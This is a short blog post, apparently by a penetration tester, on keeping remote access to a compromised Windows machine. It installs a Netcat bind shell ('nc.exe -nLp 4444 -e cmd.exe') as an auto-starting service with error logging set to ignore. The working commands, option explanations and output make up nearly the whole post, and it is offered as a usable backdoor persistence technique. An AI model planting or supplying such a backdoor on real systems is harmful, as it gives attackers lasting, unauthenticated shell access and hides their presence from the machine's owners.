Many times I’ve used Netcat to setup (reverse) shell from a compromised machine. Digging into services lately, I thought why not use a service to make Netcat a persistent to be able to return to the machine.
Adding the service
Service executables are no regular executables. Upon start, the service process returns directly after starting, but keeps the process running.
Just using “nc.exe” would block the service control and keep the status “starting…”. So we use “cmd /c start …” to return immediately after spawning the “nc.exe” process.
C:\Windows\system32>sc create NcService binPath= "cmd.exe /c start c:\nc.exe -nLp 4444 -e cmd.exe" start= auto error= ignore
[SC] CreateService SUCCESS
C:\Windows\system32>
Netcat options
Starting netcat with “c:\nc.exe -nLp 4444 -e cmd.exe”.
The options provided to “nc.exe”:
- -n : Numeric ip-address, no DNS
- -L : Persistent listener, restart listening after disconnect.
- -p : Specify to listen on port 4444
- -e : The program to run upon connect.
Netcat service create options
The options provided to “sc create”:
- “start= auto” : Automatically start the service on booting
- “error= ignore” : Do not log errors to eventlog.
- “binPath= …”
Starting and stopping
Netcat is setup now, but still it is not an actual service. Netcat will start, but there will be an error:
C:\>sc start NcService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\>
Also the status will not tell whether Netcat is running, neither will it be possible to stop the service.
To stop Netcat, use taskkill:
C:\>taskkill /f /im nc.exe
SUCCESS: The process "nc.exe" with PID 5576 has been terminated.
C:\>
Wrap up
Not very pretty, but it works fine for me…